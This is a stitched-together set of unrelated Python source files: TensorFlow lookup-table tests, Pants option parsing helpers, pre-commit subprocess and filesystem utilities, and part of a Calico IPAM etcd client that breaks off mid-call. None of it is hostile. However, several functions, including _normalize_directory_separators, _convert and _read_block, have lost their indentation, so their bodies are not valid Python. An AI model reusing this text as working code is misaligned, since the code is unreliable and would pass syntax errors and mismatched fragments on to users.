      input_string = constant_op.constant(
          ["fruit", "brain", "salad", "surgery", "UNK"])
      out1 = table1.lookup(input_string)
      out2 = table2.lookup(input_string)
      out1, out2 = sess.run([out1, out2])
      # OOV ids differ between hashers; in-vocab ids are identical.
      self.assertAllEqual([5, 0, 1, 2, 5], out1)
      self.assertAllEqual([5, 0, 1, 2, 3], out2)
      self.assertEquals(vocab_size + oov_buckets, table1.size().eval())
      self.assertEquals(vocab_size + oov_buckets, table2.size().eval())
      test_util.assert_ops_in_graph({
          "table1_Lookup/hash_bucket": "StringToHashBucketFast",
          "table2_Lookup/hash_bucket": "StringToHashBucketStrong",
      }, sess.graph)
  def testIdTableWithHashBucketsInitializationAcrossSessions(self):
    """A shared_name table initialized once is visible in a new session."""
    vocab_file = self._createVocabFile("feat_to_id_5.txt")
    shared_name = "across-sessions"
    with self.test_session():
      default_value = -1
      vocab_size = 3
      oov_buckets = 1
      table1 = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(
                  vocab_file, vocab_size=vocab_size),
              default_value,
              shared_name=shared_name), oov_buckets)
      table1.init.run()
      input_string_1 = constant_op.constant(
          ["brain", "salad", "surgery", "UNK"])
      out1 = table1.lookup(input_string_1)
      self.assertAllEqual([0, 1, 2, 3], out1.eval())
      self.assertEquals(vocab_size + oov_buckets, table1.size().eval())
    with self.test_session():
      default_value = -1
      vocab_size = 3
      oov_buckets = 1
      # Underlying lookup table already initialized in previous session.
      # No need to call table2.init.run()
      table2 = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(
                  vocab_file, vocab_size=vocab_size),
              default_value,
              shared_name=shared_name), oov_buckets)
      input_string_2 = constant_op.constant(["fruit", "salad", "UNK"])
      out2 = table2.lookup(input_string_2)
      self.assertAllEqual([3, 1, 3], out2.eval())
      self.assertEquals(vocab_size + oov_buckets, table2.size().eval())
  def testIdTableWithHashBucketsWithMultipleInitializersDifferentDefault(self):
    """Two wrappers may use different defaults over the same vocab file."""
    vocab_file = self._createVocabFile("feat_to_id_6.txt")
    with self.test_session() as sess:
      default_value1 = -1
      vocab_size = 3
      oov_buckets = 0
      table1 = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(
                  vocab_file, vocab_size=vocab_size), default_value1),
          oov_buckets)
      default_value2 = -2
      table2 = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(
                  vocab_file, vocab_size=vocab_size), default_value2),
          oov_buckets)
      lookup_ops.tables_initializer().run()
      input_string_1 = constant_op.constant(
          ["brain", "salad", "surgery", "UNK"])
      input_string_2 = constant_op.constant(["fruit", "salad", "UNK"])
      out1 = table1.lookup(input_string_1)
      out2 = table2.lookup(input_string_2)
      out1, out2 = sess.run([out1, out2])
      # With zero OOV buckets, misses fall through to each table's default.
      self.assertAllEqual([0, 1, 2, -1], out1)
      self.assertAllEqual([-2, 1, -2], out2)
      self.assertEquals(vocab_size + oov_buckets, table1.size().eval())
      self.assertEquals(vocab_size + oov_buckets, table2.size().eval())
  def testSparseTensor(self):
    """SparseTensor values are looked up; indices and shape pass through."""
    vocab_file = self._createVocabFile("feat_to_id_7.txt")
    input_indices = [[0, 0], [0, 1], [2, 0], [2, 2], [3, 0]]
    input_shape = [4, 4]
    with self.test_session() as sess:
      sp_features = sparse_tensor.SparseTensor(
          constant_op.constant(input_indices, dtypes.int64),
          constant_op.constant(["brain", "salad", "brain", "surgery", "tarkus"],
                               dtypes.string),
          constant_op.constant(input_shape, dtypes.int64))
      table = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(vocab_file, vocab_size=3),
              -1), 1)
      table.init.run()
      sp_ids = table.lookup(sp_features)
      self.assertAllEqual([5], sp_ids.values._shape_as_list())
      sp_ids_ind, sp_ids_val, sp_ids_shape = sess.run(
          [sp_ids.indices, sp_ids.values, sp_ids.dense_shape])
      self.assertAllEqual(input_indices, sp_ids_ind)
      self.assertAllEqual([0, 1, 0, 2, 3], sp_ids_val)
      self.assertAllEqual(input_shape, sp_ids_shape)
  def testInt32SparseTensor(self):
    """SparseTensor lookup with int32 values over an int64 inner table."""
    input_indices = [[0, 0], [0, 1], [2, 0], [2, 2], [3, 0]]
    input_shape = [4, 4]
    with self.test_session() as sess:
      sp_features = sparse_tensor.SparseTensor(
          constant_op.constant(input_indices, dtypes.int64),
          constant_op.constant([42, 1, 42, -1000, 11], dtypes.int32),
          constant_op.constant(input_shape, dtypes.int64))
      table = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.KeyValueTensorInitializer(
                  (42, 1, -1000), (0, 1, 2), dtypes.int64, dtypes.int64), -1),
          1,
          key_dtype=dtypes.int32)
      table.init.run()
      sp_ids = table.lookup(sp_features)
      self.assertAllEqual([5], sp_ids.values._shape_as_list())
      sp_ids_ind, sp_ids_val, sp_ids_shape = sess.run(
          [sp_ids.indices, sp_ids.values, sp_ids.dense_shape])
      self.assertAllEqual(input_indices, sp_ids_ind)
      self.assertAllEqual([0, 1, 0, 2, 3], sp_ids_val)
      self.assertAllEqual(input_shape, sp_ids_shape)
  def testInt64SparseTensor(self):
    """SparseTensor lookup with int64 values."""
    input_indices = [[0, 0], [0, 1], [2, 0], [2, 2], [3, 0]]
    input_shape = [4, 4]
    with self.test_session() as sess:
      sp_features = sparse_tensor.SparseTensor(
          constant_op.constant(input_indices, dtypes.int64),
          constant_op.constant([42, 1, 42, -1000, 11], dtypes.int64),
          constant_op.constant(input_shape, dtypes.int64))
      table = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.KeyValueTensorInitializer(
                  (42, 1, -1000), (0, 1, 2), dtypes.int64, dtypes.int64), -1),
          1,
          key_dtype=dtypes.int64)
      table.init.run()
      sp_ids = table.lookup(sp_features)
      self.assertAllEqual([5], sp_ids.values._shape_as_list())
      sp_ids_ind, sp_ids_val, sp_ids_shape = sess.run(
          [sp_ids.indices, sp_ids.values, sp_ids.dense_shape])
      self.assertAllEqual(input_indices, sp_ids_ind)
      self.assertAllEqual([0, 1, 0, 2, 3], sp_ids_val)
      self.assertAllEqual(input_shape, sp_ids_shape)
  def testIdTableWithHashBucketsWithInvalidHashers(self):
    """hasher_spec must be a supported HasherSpec with valid keys."""
    vocab_file = self._createVocabFile("feat_to_id_4.txt")
    with self.test_session():
      default_value = -1
      vocab_size = 3
      oov_buckets = 1
      lookup_table = lookup_ops.HashTable(
          lookup_ops.TextFileIdTableInitializer(
              vocab_file, vocab_size=vocab_size), default_value)
      # A non-HasherSpec value is rejected immediately.
      with self.assertRaises(TypeError):
        lookup_ops.IdTableWithHashBuckets(
            lookup_table, oov_buckets, hasher_spec=1)
      # An unknown hash function name is only rejected at lookup build.
      table = lookup_ops.IdTableWithHashBuckets(
          lookup_table,
          oov_buckets,
          hasher_spec=lookup_ops.HasherSpec("my-awesome-hash", None))
      input_string = constant_op.constant(["brain", "salad", "surgery", "UNK"])
      with self.assertRaises(ValueError):
        table.lookup(input_string)
      # StrongHashSpec requires exactly two integer keys.
      with self.assertRaises(ValueError):
        table = lookup_ops.IdTableWithHashBuckets(
            lookup_table,
            oov_buckets,
            hasher_spec=lookup_ops.StrongHashSpec([]))
      with self.assertRaises(ValueError):
        table = lookup_ops.IdTableWithHashBuckets(
            lookup_table,
            oov_buckets,
            hasher_spec=lookup_ops.StrongHashSpec([1, 2, 3]))
      with self.assertRaises(TypeError):
        table = lookup_ops.IdTableWithHashBuckets(
            lookup_table,
            oov_buckets,
            hasher_spec=lookup_ops.StrongHashSpec([None, 2]))
  def testIdTableWithHashBucketsNoInnerTable(self):
    """With no inner table there is no underlying table_ref."""
    with self.test_session():
      table = lookup_ops.IdTableWithHashBuckets(None, num_oov_buckets=1)
      self.assertIsNone(table.table_ref)
# Standard TensorFlow test entry point: runs all test cases in this module.
if __name__ == "__main__":
  test.main()
| |
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import inspect
import os
import re
import shlex
from enum import Enum
from typing import Iterable, Pattern, Sequence
from pants.option.errors import ParseError
from pants.util.eval import parse_expression
from pants.util.memo import memoized_method
class UnsetBool:
    """A sentinel type used as the default of a bool-typed option to mean "un-set".

    `bool`-typed options defaulting to `UnsetBool` that are never explicitly set
    evaluate to `None`, which gives such options tri-state semantics.

    :API: public
    """

    def __init__(self) -> None:
        # The class itself is the sentinel; instances make no sense.
        raise NotImplementedError(
            "UnsetBool cannot be instantiated. It should only be used as a sentinel type."
        )

    @classmethod
    def coerce_bool(cls, value: type[UnsetBool] | bool | None, default: bool) -> bool:
        """Collapse the tri-state `value` to a plain bool, using `default` for un-set."""
        # Both "never set" (None) and the sentinel class itself mean "use the default".
        if value is None or value is cls:
            return default
        assert isinstance(value, bool)
        return value
def target_option(s: str) -> str:
    """Identity on `str`, used as a marker type for a single target spec.

    :API: public

    TODO(stuhood): Eagerly convert these to Addresses: see https://rbcommons.com/s/twitter/r/2937/
    """
    # Purely a type marker for the options system; the value passes through unchanged.
    return s
def _normalize_directory_separators(s: str) -> str:
"""Coalesce runs of consecutive instances of `os.sep` in `s`, e.g. '//' -> '/' on POSIX.
The engine will use paths or target addresses either to form globs or to string-match against, and
including the directory separator '/' multiple times in a row e.g. '//' produces an equivalent
glob as with a single '/', but produces a different actual string, which will cause the engine to
fail to glob file paths or target specs correctly.
TODO: give the engine more control over matching paths so we don't have to sanitize the input!
"""
return os.path.normpath(s)
def dir_option(s: str) -> str:
    """Same type as 'str', but marks the string as a directory path; separators are normalized.

    :API: public
    """
    normalized = _normalize_directory_separators(s)
    return normalized
def file_option(s: str) -> str:
    """Same type as 'str', but marks the string as a file path; separators are normalized.

    :API: public
    """
    normalized = _normalize_directory_separators(s)
    return normalized
def dict_with_files_option(s):
    """Same as 'dict', but fingerprints the file contents of any values which are file paths.

    For any value which matches the path of a file on disk, the file path is not
    fingerprinted -- only its contents.

    :API: public
    """
    # Delegates parsing/merging semantics to DictValueComponent (defined in this module).
    component = DictValueComponent.create(s)
    return component
def shell_str(s: str) -> str:
    """A member_type for strings that should be split upon parsing through `shlex.split()`.

    For example, the option value `--foo --bar=val` would be split into
    `['--foo', '--bar=val']`, and then the parser will safely merge this expanded list with
    any other values defined for the option.

    :API: public
    """
    # The splitting happens later in the parser; this is purely a type marker.
    return s
def memory_size(s: str | int | float) -> int:
    """A string that normalizes the suffixes {GiB, MiB, KiB, B} into the number of bytes.

    :API: public

    :param s: a bare number (taken as bytes), or a number with a `GiB`/`MiB`/`KiB`/`B`
        suffix (case-insensitive).
    :returns: the size in bytes, truncated to an int.
    :raises pants.option.errors.ParseError: if `s` is empty or not a valid size.
    """
    if isinstance(s, (int, float)):
        return int(s)
    if not s:
        raise ParseError("Missing value.")

    original = s
    s = s.lower().strip()
    try:
        # A bare (possibly fractional) number is already in bytes.
        return int(float(s))
    except ValueError:
        pass

    def invalid() -> ParseError:
        # Constructed lazily so the happy paths never build the exception object.
        return ParseError(
            f"Invalid value: `{original}`. Expected either a bare number or a number with one of "
            f"`GiB`, `MiB`, `KiB`, or `B`."
        )

    def convert_to_bytes(power_of_2) -> int:
        try:
            # NOTE: float() raises ValueError (not TypeError) on a malformed numeric
            # prefix such as `xGiB`, so both must be caught to surface ParseError.
            return int(float(s[:-3]) * (2 ** power_of_2))  # type: ignore[index]
        except (TypeError, ValueError):
            raise invalid()

    if s.endswith("gib"):
        return convert_to_bytes(30)
    elif s.endswith("mib"):
        return convert_to_bytes(20)
    elif s.endswith("kib"):
        return convert_to_bytes(10)
    elif s.endswith("b"):
        try:
            return int(float(s[:-1]))
        except (TypeError, ValueError):
            raise invalid()
    raise invalid()
def _convert(val, acceptable_types):
"""Ensure that val is one of the acceptable types, converting it if needed.
:param val: The value we're parsing (either a string or one of the acceptable types).
:param acceptable_types: A tuple of expected types for val.
:returns: The parsed value.
:raises :class:`pants.options.errors.ParseError`: if there was a problem parsing the val as an
acceptable type.
"""
if isinstance(val, acceptable_types):
return val
return parse_expression(val, acceptable_types, raise_type=ParseError)
def _convert_list(val, member_type, is_enum):
    """Parse `val` into a list/tuple, coercing members into `member_type` if it is an enum."""
    items = _convert(val, (list, tuple))
    if is_enum:
        # Coerce raw values into enum members; existing members pass through untouched.
        return [x if isinstance(x, member_type) else member_type(x) for x in items]
    return items
def _flatten_shlexed_list(shlexed_args: Sequence[str]) -> list[str]:
"""Convert a list of shlexed args into a flattened list of individual args.
For example, ['arg1 arg2=foo', '--arg3'] would be converted to ['arg1', 'arg2=foo', '--arg3'].
"""
return [arg for shlexed_arg in shlexed_args for arg in shlex.split(shlexed_arg)]
class ListValueComponent:
    """A component of the value of a list-typed option.

    One or more instances of this class can be merged to form a list value.

    A component consists of values to append and values to filter while constructing the final
    list.

    Each component may either replace or modify the preceding component. So that, e.g., a config
    file can append to and/or filter the default value list, instead of having to repeat most
    of the contents of the default value list.
    """

    REPLACE = "REPLACE"
    MODIFY = "MODIFY"

    # We use a regex to parse the comma-separated lists of modifier expressions (each of which is
    # a list or tuple literal preceded by a + or a -). Note that these expressions are technically
    # a context-free grammar, but in practice using this regex as a heuristic will work fine. The
    # values that could defeat it are extremely unlikely to be encountered in practice.
    # If we do ever encounter them, we'll have to replace this with a real parser.
    @classmethod
    @memoized_method
    def _get_modifier_expr_re(cls) -> Pattern[str]:
        # Note that the regex consists of a positive lookbehind assertion for a ] or a ),
        # followed by a comma (possibly surrounded by whitespace), followed by a
        # positive lookahead assertion for [ or (. The lookahead/lookbehind assertions mean that
        # the bracket/paren characters don't get consumed in the split.
        return re.compile(r"(?<=\]|\))\s*,\s*(?=[+-](?:\[|\())")

    @classmethod
    def _split_modifier_expr(cls, s: str) -> list[str]:
        # This check ensures that the first expression (before the first split point) is a
        # modification.
        if s.startswith("+") or s.startswith("-"):
            return cls._get_modifier_expr_re().split(s)
        return [s]

    @classmethod
    def merge(cls, components: Iterable[ListValueComponent]) -> ListValueComponent:
        """Merges components into a single component, applying their actions appropriately.

        This operation is associative: M(M(a, b), c) == M(a, M(b, c)) == M(a, b, c).

        :raises ParseError: if a component carries an unknown action.
        """
        # Note that action of the merged component is MODIFY until the first REPLACE is
        # encountered. This guarantees associativity.
        action = cls.MODIFY
        appends = []
        filters = []
        for component in components:
            if component._action is cls.REPLACE:
                # Bug fix: copy, rather than alias, the component's lists. Later MODIFY
                # components extend() these lists in place, so aliasing mutated the REPLACE
                # component's own state and leaked shared state into the merged result.
                appends = list(component._appends)
                filters = list(component._filters)
                action = cls.REPLACE
            elif component._action is cls.MODIFY:
                appends.extend(component._appends)
                filters.extend(component._filters)
            else:
                raise ParseError(f"Unknown action for list value: {component._action}")
        return cls(action, appends, filters)

    def __init__(self, action: str, appends: list, filters: list) -> None:
        # action: REPLACE or MODIFY, relative to the preceding component.
        self._action = action
        self._appends = appends
        self._filters = filters

    @property
    def val(self) -> list:
        """The list this component represents on its own: appends with all filtered values removed."""
        ret = list(self._appends)
        for x in self._filters:
            # Note: can't do ret.remove(x) because that only removes the first instance of x.
            ret = [y for y in ret if y != x]
        return ret

    @property
    def action(self):
        return self._action

    @classmethod
    def create(cls, value, member_type=str) -> ListValueComponent:
        """Interpret value as either a list or something to extend another list with.

        Note that we accept tuple literals, but the internal value is always a list.

        :param value: The value to convert. Can be an instance of ListValueComponent, a list, a
                      tuple, a string representation of a list or tuple (possibly prefixed by + or -
                      indicating modification instead of replacement), or any allowed member_type.
                      May also be a comma-separated sequence of modifications.
        """
        if isinstance(value, cls):  # Ensure idempotency.
            return value
        if isinstance(value, bytes):
            value = value.decode()
        if isinstance(value, str):
            # A string may be several modifier expressions; merge them recursively.
            comma_separated_exprs = cls._split_modifier_expr(value)
            if len(comma_separated_exprs) > 1:
                return cls.merge([cls.create(x) for x in comma_separated_exprs])
        action = cls.MODIFY
        appends: Sequence[str] = []
        filters: Sequence[str] = []
        is_enum = inspect.isclass(member_type) and issubclass(member_type, Enum)
        if isinstance(value, (list, tuple)):  # Ensure we can handle list-typed default values.
            action = cls.REPLACE
            appends = value
        elif value.startswith("[") or value.startswith("("):
            action = cls.REPLACE
            appends = _convert_list(value, member_type, is_enum)
        elif value.startswith("+[") or value.startswith("+("):
            appends = _convert_list(value[1:], member_type, is_enum)
        elif value.startswith("-[") or value.startswith("-("):
            filters = _convert_list(value[1:], member_type, is_enum)
        elif is_enum and isinstance(value, str):
            appends = _convert_list([value], member_type, True)
        elif isinstance(value, str):
            appends = [value]
        else:
            # A single non-string scalar: wrap it in list syntax and parse.
            appends = _convert(f"[{value}]", list)
        if member_type == shell_str:
            # shell_str members may each contain several shell-quoted args; flatten them.
            appends = _flatten_shlexed_list(appends)
            filters = _flatten_shlexed_list(filters)
        return cls(action, list(appends), list(filters))

    def __repr__(self) -> str:
        return f"{self._action} +{self._appends} -{self._filters}"
class DictValueComponent:
    """A component of the value of a dict-typed option.

    One or more instances of this class can be merged to form a dict value.

    Each component may either replace or extend the preceding component. So that, e.g., a config
    file can extend the default value of a dict, instead of having to repeat it.
    """

    REPLACE = "REPLACE"
    EXTEND = "EXTEND"

    @classmethod
    def merge(cls, components: Iterable[DictValueComponent]) -> DictValueComponent:
        """Merges components into a single component, applying their actions appropriately.

        This operation is associative: M(M(a, b), c) == M(a, M(b, c)) == M(a, b, c).

        :raises ParseError: if a component carries an unknown action.
        """
        # Note that action of the merged component is EXTEND until the first REPLACE is
        # encountered. This guarantees associativity.
        action = cls.EXTEND
        val = {}
        for component in components:
            if component.action is cls.REPLACE:
                # Bug fix: copy, rather than alias, the component's dict. Later EXTEND
                # components update() this dict in place, so aliasing mutated the REPLACE
                # component's own state and leaked shared state into the merged result.
                val = dict(component.val)
                action = cls.REPLACE
            elif component.action is cls.EXTEND:
                val.update(component.val)
            else:
                raise ParseError(f"Unknown action for dict value: {component.action}")
        return cls(action, val)

    def __init__(self, action: str, val: dict) -> None:
        # action: REPLACE or EXTEND, relative to the preceding component.
        self.action = action
        self.val = val

    @classmethod
    def create(cls, value) -> DictValueComponent:
        """Interpret value as either a dict or something to extend another dict with.

        :param value: The value to convert. Can be an instance of DictValueComponent, a dict,
                      or a string representation (possibly prefixed by +) of a dict.
        :raises ParseError: if the value cannot be interpreted as a dict.
        """
        if isinstance(value, bytes):
            value = value.decode()
        if isinstance(value, cls):  # Ensure idempotency.
            action = value.action
            val = value.val
        elif isinstance(value, dict):  # Ensure we can handle dict-typed default values.
            action = cls.REPLACE
            val = value
        elif value.startswith("{"):
            action = cls.REPLACE
            val = _convert(value, dict)
        elif value.startswith("+{"):
            action = cls.EXTEND
            val = _convert(value[1:], dict)
        else:
            raise ParseError(f"Invalid dict value: {value}")
        # Copy so the component never shares its dict with the caller's value.
        return cls(action, dict(val))

    def __repr__(self) -> str:
        return f"{self.action} {self.val}"
| |
from __future__ import unicode_literals
import contextlib
import errno
import functools
import os
import os.path
import shutil
import stat
import subprocess
import tarfile
import tempfile
import pkg_resources
from pre_commit import five
@contextlib.contextmanager
def cwd(path):
    """Context manager: chdir into *path*, restoring the previous cwd on exit."""
    saved = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(saved)
def mkdirp(path):
    """Create *path* (including parents); succeed silently if it already exists."""
    try:
        os.makedirs(path)
    except OSError:
        # Swallow the error only when the directory actually exists
        # (e.g. created concurrently); re-raise genuine failures.
        if os.path.exists(path):
            return
        raise
def memoize_by_cwd(func):
    """Memoize a function call based on os.getcwd()."""
    @functools.wraps(func)
    def wrapper(*args):
        key = (os.getcwd(),) + args
        cache = wrapper._cache
        if key not in cache:
            cache[key] = func(*args)
        return cache[key]
    # Cache is exposed on the wrapper so callers/tests can inspect or clear it.
    wrapper._cache = {}
    return wrapper
@contextlib.contextmanager
def clean_path_on_failure(path):
    """Remove *path* (when present) if the managed body raises, then re-raise."""
    try:
        yield
    except BaseException:
        # Best-effort cleanup: the path may never have been created.
        if os.path.exists(path):
            rmtree(path)
        raise
@contextlib.contextmanager
def noop_context():
    """A context manager that does nothing and yields nothing."""
    yield None
def shell_escape(arg):
    """Single-quote *arg* for safe interpolation into a POSIX shell command line.

    Embedded single quotes are rewritten as '"'"' (close the quote, emit a
    double-quoted literal quote, reopen the quote).
    """
    # Fix: the original called .strip() on the constant replacement string —
    # a confusing no-op (the constant contains no whitespace); removed.
    return "'" + arg.replace("'", "'\"'\"'") + "'"
def no_git_env():
    """Return a copy of os.environ with every GIT_* variable removed.

    Too many bugs dealing with environment variables and GIT:
    https://github.com/pre-commit/pre-commit/issues/300
    In git 2.6.3 (maybe others), git exports GIT_WORK_TREE while running
    pre-commit hooks.
    In git 1.9.1 (maybe others), git exports GIT_DIR and GIT_INDEX_FILE
    while running pre-commit hooks in submodules.
    GIT_DIR: Causes git clone to clone wrong thing.
    GIT_INDEX_FILE: Causes 'error invalid object ...' during commit.
    """
    return {k: v for k, v in os.environ.items() if not k.startswith('GIT_')}
@contextlib.contextmanager
def tarfile_open(*args, **kwargs):
    """Compatibility layer because python2.6: tarfile.open as a context manager."""
    # contextlib.closing gives exactly the original try/finally-close behavior.
    with contextlib.closing(tarfile.open(*args, **kwargs)) as tf:
        yield tf
@contextlib.contextmanager
def tmpdir():
    """Contextmanager to create a temporary directory. It will be cleaned up
    afterwards.
    """
    path = tempfile.mkdtemp()
    try:
        yield path
    finally:
        # Use the module's rmtree so readonly entries are handled on Windows.
        rmtree(path)
def resource_filename(filename):
    """Return the on-disk path of *filename* from pre_commit's bundled resources."""
    relative = os.path.join('resources', filename)
    return pkg_resources.resource_filename('pre_commit', relative)
class CalledProcessError(RuntimeError):
    """Raised by cmd_output when a command exits with an unexpected return code.

    Carries the command, actual and expected return codes, and the captured
    (stdout, stderr) pair so callers can render a readable report.
    """

    def __init__(self, returncode, cmd, expected_returncode, output=None):
        super(CalledProcessError, self).__init__(
            returncode, cmd, expected_returncode, output,
        )
        self.returncode = returncode
        self.cmd = cmd
        self.expected_returncode = expected_returncode
        # output: a (stdout, stderr) tuple of text/bytes, or None.
        self.output = output

    def to_bytes(self):
        # Render each captured stream; '(none)' stands in for an empty stream.
        output = []
        for maybe_text in self.output:
            if maybe_text:
                output.append(
                    b'\n ' +
                    five.to_bytes(maybe_text).replace(b'\n', b'\n ')
                )
            else:
                output.append(b'(none)')
        return b''.join((
            five.to_bytes(
                'Command: {0!r}\n'
                'Return code: {1}\n'
                'Expected return code: {2}\n'.format(
                    self.cmd, self.returncode, self.expected_returncode
                )
            ),
            b'Output: ', output[0], b'\n',
            b'Errors: ', output[1], b'\n',
        ))

    def to_text(self):
        return self.to_bytes().decode('UTF-8')

    # Wire the str/bytes conversion dunders appropriately for the running
    # interpreter: py3 wants __bytes__/__str__ (text), py2 wants __str__
    # (bytes) and __unicode__ (text).
    if five.PY3:  # pragma: no cover
        __bytes__ = to_bytes
        __str__ = to_text
    else:
        __str__ = to_bytes
        __unicode__ = to_text
def cmd_output(*cmd, **kwargs):
    """Run *cmd* and return a (returncode, stdout, stderr) tuple.

    Keyword arguments:
        retcode: the expected return code; a mismatch raises
            CalledProcessError. Pass None to accept any return code.
            Defaults to 0.
        stdin: text fed to the process's stdin (UTF-8 encoded), or None.
        encoding: codec used to decode stdout/stderr; pass None to get raw
            bytes back. Defaults to 'UTF-8'.
        __popen: the Popen factory — overridable for testing.
    Any remaining kwargs are forwarded to Popen.
    """
    retcode = kwargs.pop('retcode', 0)
    stdin = kwargs.pop('stdin', None)
    encoding = kwargs.pop('encoding', 'UTF-8')
    __popen = kwargs.pop('__popen', subprocess.Popen)
    popen_kwargs = {
        'stdin': subprocess.PIPE,
        'stdout': subprocess.PIPE,
        'stderr': subprocess.PIPE,
    }
    if stdin is not None:
        stdin = stdin.encode('UTF-8')
    # py2/py3 on windows are more strict about the types here
    cmd = [five.n(arg) for arg in cmd]
    # Normalize env keys/values to native strings; an empty env collapses to
    # None, which makes Popen inherit the parent environment.
    kwargs['env'] = dict(
        (five.n(key), five.n(value))
        for key, value in kwargs.pop('env', {}).items()
    ) or None
    # Caller kwargs override the default PIPE settings.
    popen_kwargs.update(kwargs)
    proc = __popen(cmd, **popen_kwargs)
    stdout, stderr = proc.communicate(stdin)
    if encoding is not None and stdout is not None:
        stdout = stdout.decode(encoding)
    if encoding is not None and stderr is not None:
        stderr = stderr.decode(encoding)
    returncode = proc.returncode
    if retcode is not None and retcode != returncode:
        raise CalledProcessError(
            returncode, cmd, retcode, output=(stdout, stderr),
        )
    return proc.returncode, stdout, stderr
def rmtree(path):
    """shutil.rmtree variant that also removes readonly entries (needed on Windows)."""
    def _on_error(func, subpath, exc_info):  # pragma: no cover (windows)
        err = exc_info[1]
        # Only retry permission errors from the removal primitives; anything
        # else re-raises the in-flight exception.
        if func not in (os.rmdir, os.remove, os.unlink) or err.errno != errno.EACCES:
            raise
        os.chmod(subpath, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
        func(subpath)

    shutil.rmtree(path, ignore_errors=False, onerror=_on_error)
| |
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from etcd import EtcdKeyNotFound, EtcdAlreadyExist, EtcdCompareFailed
from netaddr import IPAddress, IPNetwork
import logging
import random
from pycalico.datastore_datatypes import IPPool, IPAMConfig
from pycalico.datastore import DatastoreClient, handle_errors
from pycalico.datastore import (IPAM_HOSTS_PATH,
IPAM_HOST_PATH,
IPAM_HOST_AFFINITY_PATH,
IPAM_BLOCK_PATH,
IPAM_HANDLE_PATH,
IPAM_CONFIG_PATH)
from pycalico.datastore_errors import (DataStoreError,
PoolNotFound,
InvalidBlockSizeError)
from pycalico.block import (AllocationBlock,
get_block_cidr_for_address,
validate_block_size,
BLOCK_PREFIXLEN,
AddressNotAssignedError,
NoHostAffinityError)
from pycalico.handle import (AllocationHandle,
AddressCountTooLow)
from pycalico.util import get_hostname
# Module-level logger; the NullHandler suppresses "no handlers could be
# found" warnings when the embedding application hasn't configured logging.
_log = logging.getLogger(__name__)
_log.addHandler(logging.NullHandler())

# Maximum attempts for the compare-and-swap retry loops in this module.
RETRIES = 100
# Maximum KeyError-triggered requeues when assigning from affine blocks.
KEY_ERROR_RETRIES = 3
class BlockHandleReaderWriter(DatastoreClient):
    """
    Can read and write allocation blocks and handles to the data store, as well
    as related bits of state.

    This class keeps etcd specific code from being in the main IPAMClient
    class.
    """
def _read_block(self, block_cidr):
"""
Read the block from the data store.
:param block_cidr: The IPNetwork identifier for a block.
:return: An AllocationBlock object
"""
key = _block_datastore_key(block_cidr)
try:
# Use quorum=True to ensure we don't get stale reads. Without this
# we allow many subtle race conditions, such as creating a block,
# then later reading it and finding it doesn't exist.
result = self.etcd_client.read(key, quorum=True)
except EtcdKeyNotFound:
raise KeyError(str(block_cidr))
block = AllocationBlock.from_etcd_result(result)
return block
    def _compare_and_swap_block(self, block):
        """
        Write the block using an atomic Compare-and-swap.

        :param block: The AllocationBlock to write.
        :raises CASError: if the block was modified (or created) concurrently;
            callers should re-read the block and retry.
        """
        # If the block has a db_result, CAS against that.
        if block.db_result is not None:
            _log.debug("CAS Update block %s", block)
            try:
                self.etcd_client.update(block.update_result())
            except EtcdCompareFailed:
                raise CASError(str(block.cidr))
        else:
            # No db_result means the block was never read from etcd, so it is
            # new: write only if the key does not already exist.
            _log.debug("CAS Write new block %s", block)
            key = _block_datastore_key(block.cidr)
            value = block.to_json()
            try:
                self.etcd_client.write(key, value, prevExist=False)
            except EtcdAlreadyExist:
                raise CASError(str(block.cidr))
    def _delete_block(self, block):
        """
        Delete a block using an atomic delete operation.

        Raises CASError if the block has been modified.
        """
        try:
            # prevIndex makes the delete conditional on the block being
            # unchanged since it was read.
            self.etcd_client.delete(
                block.db_result.key,
                prevIndex=block.db_result.modifiedIndex)
        except EtcdCompareFailed:
            raise CASError(str(block.cidr))
    def _get_affine_blocks(self, host, version, pool):
        """
        Get the blocks for which this host has affinity.

        :param host: The host ID to get affinity for.
        :param version: 4 for IPv4, 6 for IPv6.
        :param pool: Limit blocks to a specific pool, or pass None to find all
        blocks for the specified version.
        :return: List of IPNetwork block CIDRs.
        """
        # Construct the path
        path = IPAM_HOST_AFFINITY_PATH % {"host": host,
                                          "version": version}
        block_ids = []
        try:
            result = self.etcd_client.read(path, quorum=True).children
            for child in result:
                packed = child.key.split("/")
                # A well-formed affinity key splits into 9 segments; anything
                # else is an intermediate directory entry and is skipped.
                # TODO confirm against the IPAM_HOST_AFFINITY_PATH layout.
                if len(packed) == 9:
                    # block_ids are encoded 192.168.1.0/24 -> 192.168.1.0-24
                    # in etcd.
                    block_ids.append(IPNetwork(packed[8].replace("-", "/")))
        except EtcdKeyNotFound:
            # Means the path is empty.
            pass
        # If pool specified, filter to only include ones in the pool.
        if pool is not None:
            assert isinstance(pool, IPPool)
            block_ids = [cidr for cidr in block_ids if cidr in pool]
        return block_ids
    def _get_host_block_pairs(self, pool):
        """
        Get the affine blocks and corresponding host for all affine blocks
        within the specified pool.

        :param pool: Limit blocks to a specific pool.
        :return: List of tuples (host, cidr)
        """
        assert isinstance(pool, IPPool)
        # Construct the path
        hosts_and_blocks = []
        try:
            result = self.etcd_client.read(IPAM_HOSTS_PATH,
